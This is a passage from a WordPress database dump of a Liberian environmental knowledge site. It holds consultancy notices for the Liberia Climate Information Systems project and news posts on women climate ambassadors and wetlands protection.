08:33:07','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/3a_reoi_international_consultant_to_develop_the_portal_for_the_liberia_meteorological_and_hydrological_services_lmhs.pdf',0,'attachment','application/pdf',0),(5752,38,'2026-01-27 08:33:52','2026-01-27 08:33:52','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environment-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of this consultancy is to deliver a secure, user-friendly, and fully functional portal that enables users to access meteorological and hydrological data in real time and retrospectively. The portal should support climate modeling, forecasting operations, and early warning system functionalities. In addition, it must enhance the accessibility of climate data for policymakers and stakeholders, allowing them to make informed decisions. Lastly, the portal is expected to be scalable, interoperable with related systems, and compliant with global data and information-sharing standards. This endeavor aims to establish a basis for targeted interventions and to support the monitoring, evaluation, and reporting of project activities and outputs under the Green Climate Fund Simplified Approval Process (SAP) Project (SAP018 \"Enhancing Climate Information Systems for Resilient Development in Liberia (Liberia CIS)\").\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/3a_reoi_international_consultant_to_develop_the_portal_for_the_liberia_meteorological_and_hydrological_services_lmhs.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop Liberia Meteorological and Hydrological Services (LMHS) Information Portal - Liberia CIS Project','','inherit','closed','closed','','5749-revision-v1','','','2026-01-27 08:33:52','2026-01-27 08:33:52','',5749,'https://ekmsliberia.info/?p=5752',0,'revision','',0),(5753,38,'2026-01-27 08:38:58','2026-01-27 08:38:58','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to conduct a climate hazards Assessments that will detailed climate hazards and vulnerability assessment for Liberia as well as creating a National Climate Information Database to centralize climate data for policymakers, researchers, and stakeholders and building the capacity of institutions managing climate data and analyzing risks in Liberia. By accomplishing the objectives, the study will support the Liberia Climate Information System (CIS) project’s goal of developing a functional Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with the EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/2a_reoi_international_consultant_to_develop_climate_hazards_assessments_and_a_national_climate_information_database.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop Climate Hazards Assessments and National database - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-consultancy-services-for-international-consultant-to-develop-climate-hazards-assessments-and-national-database-liberia-cis-project','','','2026-02-23 10:17:10','2026-02-23 10:17:10','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5753',18,'ekms_bulletin','',0),(5754,38,'2026-01-27 08:37:10','2026-01-27 08:37:10','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to conduct a climate hazards Assessments that will detailed climate hazards and vulnerability assessment for Liberia as well as creating a National Climate Information Database to centralize climate data for policymakers, researchers, and stakeholders and building the capacity of institutions managing climate data and analyzing risks in Liberia. By accomplishing the objectives, the study will support the Liberia Climate Information System (CIS) project’s goal of developing a functional Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with the EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\nClick to:\r\n\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop Climate Hazards Assessments and National database - Liberia CIS Project','','inherit','closed','closed','','5753-revision-v1','','','2026-01-27 08:37:10','2026-01-27 08:37:10','',5753,'https://ekmsliberia.info/?p=5754',0,'revision','',0),(5755,38,'2026-01-27 08:37:40','2026-01-27 08:37:40','','2a_reoi_international_consultant_to_develop_climate_hazards_assessments_and_a_national_climate_information_database','','inherit','open','closed','','2a_reoi_international_consultant_to_develop_climate_hazards_assessments_and_a_national_climate_information_database','','','2026-01-27 08:37:40','2026-01-27 08:37:40','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/2a_reoi_international_consultant_to_develop_climate_hazards_assessments_and_a_national_climate_information_database.pdf',0,'attachment','application/pdf',0),(5756,38,'2026-01-27 08:38:58','2026-01-27 08:38:58','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to conduct a climate hazards Assessments that will detailed climate hazards and vulnerability assessment for Liberia as well as creating a National Climate Information Database to centralize climate data for policymakers, researchers, and stakeholders and building the capacity of institutions managing climate data and analyzing risks in Liberia. By accomplishing the objectives, the study will support the Liberia Climate Information System (CIS) project’s goal of developing a functional Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with the EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/2a_reoi_international_consultant_to_develop_climate_hazards_assessments_and_a_national_climate_information_database.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop Climate Hazards Assessments and National database - Liberia CIS Project','','inherit','closed','closed','','5753-revision-v1','','','2026-01-27 08:38:58','2026-01-27 08:38:58','',5753,'https://ekmsliberia.info/?p=5756',0,'revision','',0),(5757,38,'2026-01-27 08:43:54','2026-01-27 08:43:54','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environment-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to develop a comprehensive and practical guidelines that will standardize, harmonize, and streamline the generation, collection, processing, dissemination, and utilization of meteorological and hydrological data in Liberia. By accomplishing the objectives, the study will seeks to enhance the operational efficiency and interoperability of Liberia’s key agencies responsible for weather and climate data particularly the Liberia Meteorological Service (LMS) and Liberia Hydrological Service (LHS) as well as establishing a clear institutional roles, data-sharing protocols, quality control procedures, and communication mechanisms to ensure that climate and weather information is timely, reliable, and actionable. Also, the study will support the Liberia Climate Information System (CIS) project’s goal of developing a functional Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF- EWS).\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/1a_reoi_international_consultant_to_develop_guidelines_for_streamlining_meteorological_and_hydrological.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','EOI - Liberia - Consultancy Services for International Consultant to Develop Guidelines for Streamlining Meteorological and Hydrological Information Generation - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-consultancy-services-for-international-consultant-to-develop-guidelines-for-streamlining-meteorological-and-hydrological-information-generation-liberia-cis-project','','','2026-02-23 10:11:14','2026-02-23 10:11:14','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5757',17,'ekms_bulletin','',0),(5758,38,'2026-01-27 08:42:39','2026-01-27 08:42:39','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environment-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to develop a comprehensive and practical guidelines that will standardize, harmonize, and streamline the generation, collection, processing, dissemination, and utilization of meteorological and hydrological data in Liberia. By accomplishing the objectives, the study will seeks to enhance the operational efficiency and interoperability of Liberia’s key agencies responsible for weather and climate data particularly the Liberia Meteorological Service (LMS) and Liberia Hydrological Service (LHS) as well as establishing a clear institutional roles, data-sharing protocols, quality control procedures, and communication mechanisms to ensure that climate and weather information is timely, reliable, and actionable. Also, the study will support the Liberia Climate Information System (CIS) project’s goal of developing a functional Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF- EWS).\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\n</div>\r\nClick to:','EOI - Liberia - Consultancy Services for International Consultant to Develop Guidelines for Streamlining Meteorological and Hydrological Information Generation - Liberia CIS Project','','inherit','closed','closed','','5757-revision-v1','','','2026-01-27 08:42:39','2026-01-27 08:42:39','',5757,'https://ekmsliberia.info/?p=5758',0,'revision','',0),(5759,38,'2026-01-27 08:42:58','2026-01-27 08:42:58','','1a_reoi_international_consultant_to_develop_guidelines_for_streamlining_meteorological_and_hydrological','','inherit','open','closed','','1a_reoi_international_consultant_to_develop_guidelines_for_streamlining_meteorological_and_hydrological','','','2026-01-27 08:42:58','2026-01-27 08:42:58','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/1a_reoi_international_consultant_to_develop_guidelines_for_streamlining_meteorological_and_hydrological.pdf',0,'attachment','application/pdf',0),(5760,38,'2026-01-27 08:43:54','2026-01-27 08:43:54','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Background</strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n\r\nThe EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\n</div>\r\n</div>\r\n<div class=\"layoutArea\">\r\n<div class=\"column\"></div>\r\n</div>\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decision- making, planning, and response actions Countrywide. The objective of the project is to strengthen Liberia’s climate-related observation and monitoring capabilities, early warning and early action systems, and other environment-related information systems. The objective seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response by integrating green growth, environmental resilience, and adaptation into national development planning through effective climate information systems in Liberia.\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe main objective of the consultants is to develop a comprehensive and practical guidelines that will standardize, harmonize, and streamline the generation, collection, processing, dissemination, and utilization of meteorological and hydrological data in Liberia. By accomplishing the objectives, the study will seeks to enhance the operational efficiency and interoperability of Liberia’s key agencies responsible for weather and climate data particularly the Liberia Meteorological Service (LMS) and Liberia Hydrological Service (LHS) as well as establishing a clear institutional roles, data-sharing protocols, quality control procedures, and communication mechanisms to ensure that climate and weather information is timely, reliable, and actionable. Also, the study will support the Liberia Climate Information System (CIS) project’s goal of developing a functional Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF- EWS).\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\n</div>\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/1a_reoi_international_consultant_to_develop_guidelines_for_streamlining_meteorological_and_hydrological.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','EOI - Liberia - Consultancy Services for International Consultant to Develop Guidelines for Streamlining Meteorological and Hydrological Information Generation - Liberia CIS Project','','inherit','closed','closed','','5757-revision-v1','','','2026-01-27 08:43:54','2026-01-27 08:43:54','',5757,'https://ekmsliberia.info/?p=5760',0,'revision','',0),(5761,38,'2026-01-07 14:34:45','2026-01-07 14:34:45','<strong>Background</strong>\r\n\r\nThe GEF fosters projects for sustainable development and environmental preservation. This assessment is crucial for understanding how GEF-8 projects align with national priorities.\r\n\r\n<strong>Objective</strong>\r\n\r\nDemonstrate how GEF-8 projects support national environmental goals. This includes collecting and analyzing data on their impact.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/Terms-of-Reference-GEF-PROJECT-ALIGNMENT.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Terms of Reference (ToR) for Consultancy to Prepare a Report that Clearly Outlines How GEF Funding Aligns with and Supports the Government\'s National Development Agenda','','publish','closed','closed','','terms-of-reference-tor-for-consultancy-to-prepare-a-report-that-clearly-outlines-how-gef-funding-aligns-with-and-supports-the-governments-national-development-agenda','','','2026-01-28 14:39:46','2026-01-28 14:39:46','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5761',16,'ekms_bulletin','',0),(5762,38,'2026-01-28 12:23:42','2026-01-28 12:23:42','<!-- wp:paragraph -->\n<p>At the opening ceremony at K-Plaza Hotel, EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo noted that climate change is already disrupting lives and livelihoods across Liberia—through flooding, coastal erosion, and unpredictable weather. He stressed that while women are often among the most affected, they are also central to building strong, resilient communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This initiative marks a shift from viewing women solely as victims of climate change to recognizing them as leaders, communicators, and first responders,” Dr. Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training will strengthen last-mile delivery of climate and disaster information, ensuring early warnings are understood, trusted, and acted upon at the community level. Participants will build skills in climate risk awareness, early warning systems, disaster preparedness, and leadership.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative will also establish a growing network of Women Climate Ambassadors to share climate information across households, farms, markets, and schools—helping protect lives and strengthen resilience nationwide.</p>\n<!-- /wp:paragraph -->','The Environmental Protection Agency (EPA), through the Climate Information Systems (CIS) Project, has launched a training and validation program to empower women as Climate Ambassadors and members of Disaster Management Committees.','','publish','open','open','','the-environmental-protection-agency-epa-through-the-climate-information-systems-cis-project-has-launched-a-training-and-validation-program-to-empower-women-as-climate-ambassadors-and-members-of','','','2026-01-28 12:23:44','2026-01-28 12:23:44','',0,'https://ekmsliberia.info/?p=5762',29,'post','',0),(5763,38,'2026-01-28 12:23:34','2026-01-28 12:23:34','','cis','','inherit','open','closed','','cis','','','2026-01-28 12:23:34','2026-01-28 12:23:34','',5762,'https://ekmsliberia.info/wp-content/uploads/2026/01/cis.jpeg',0,'attachment','image/jpeg',0),(5764,38,'2026-01-28 12:23:42','2026-01-28 12:23:42','<!-- wp:paragraph -->\n<p>At the opening ceremony at K-Plaza Hotel, EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo noted that climate change is already disrupting lives and livelihoods across Liberia—through flooding, coastal erosion, and unpredictable weather. He stressed that while women are often among the most affected, they are also central to building strong, resilient communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This initiative marks a shift from viewing women solely as victims of climate change to recognizing them as leaders, communicators, and first responders,” Dr. Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training will strengthen last-mile delivery of climate and disaster information, ensuring early warnings are understood, trusted, and acted upon at the community level. Participants will build skills in climate risk awareness, early warning systems, disaster preparedness, and leadership.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative will also establish a growing network of Women Climate Ambassadors to share climate information across households, farms, markets, and schools—helping protect lives and strengthen resilience nationwide.</p>\n<!-- /wp:paragraph -->','The Environmental Protection Agency (EPA), through the Climate Information Systems (CIS) Project, has launched a training and validation program to empower women as Climate Ambassadors and members of Disaster Management Committees.','','inherit','closed','closed','','5762-revision-v1','','','2026-01-28 12:23:42','2026-01-28 12:23:42','',5762,'https://ekmsliberia.info/?p=5764',0,'revision','',0),(5765,38,'2026-01-28 14:37:53','2026-01-28 14:37:53','<strong>Background</strong>\r\n\r\nThe GEF fosters projects for sustainable development and environmental preservation. This assessment is crucial for understanding how GEF-8 projects align with national priorities.\r\n\r\n<strong>Objective</strong>\r\n\r\nDemonstrate how GEF-8 projects support national environmental goals. This includes collecting and analyzing data on their impact.\r\n\r\n&nbsp;\r\n\r\nClick to:','Terms of Reference (ToR) for Consultancy to Prepare a Report that Clearly Outlines How GEF Funding Aligns with and Supports the Government\'s National Development Agenda','','inherit','closed','closed','','5761-revision-v1','','','2026-01-28 14:37:53','2026-01-28 14:37:53','',5761,'https://ekmsliberia.info/?p=5765',0,'revision','',0),(5766,38,'2026-01-28 14:38:51','2026-01-28 14:38:51','','Terms of Reference GEF PROJECT ALIGNMENT','','inherit','open','closed','','terms-of-reference-gef-project-alignment','','','2026-01-28 14:38:51','2026-01-28 14:38:51','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/Terms-of-Reference-GEF-PROJECT-ALIGNMENT.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5767,38,'2026-01-28 14:39:46','2026-01-28 14:39:46','<strong>Background</strong>\r\n\r\nThe GEF fosters projects for sustainable development and environmental preservation. This assessment is crucial for understanding how GEF-8 projects align with national priorities.\r\n\r\n<strong>Objective</strong>\r\n\r\nDemonstrate how GEF-8 projects support national environmental goals. This includes collecting and analyzing data on their impact.\r\n\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/Terms-of-Reference-GEF-PROJECT-ALIGNMENT.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Terms of Reference (ToR) for Consultancy to Prepare a Report that Clearly Outlines How GEF Funding Aligns with and Supports the Government\'s National Development Agenda','','inherit','closed','closed','','5761-revision-v1','','','2026-01-28 14:39:46','2026-01-28 14:39:46','',5761,'https://ekmsliberia.info/?p=5767',0,'revision','',0),(5782,38,'2026-02-13 01:38:05','2026-02-13 01:38:05','','EKMS LIB','','inherit','open','closed','','ekms-lib','','','2026-02-13 01:38:05','2026-02-13 01:38:05','',0,'https://ekmsliberia.info/wp-content/uploads/2026/02/EKMS-LIB.jpg',0,'attachment','image/jpeg',0),(5769,38,'2026-02-03 23:15:58','2026-02-03 23:15:58','<!-- wp:paragraph -->\n<p>Paynesville, February 3, 2026_The Environmental Protection Agency of Liberia (EPA) has announced a series of new measures aimed at strengthening the protection of the country’s wetlands.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The measures include plans for a proposed US$3.2 million Wetlands Protection Program, the planned employment of youth as wetlands security officers, the removal of illegal structures, the installation of barriers to prevent encroachment, the restoration of degraded wetland areas, the creation of protected mangrove parks, and the use of drones for monitoring and documentation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The announcement was made on Monday, February 2, 2026, by EPA Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, during the 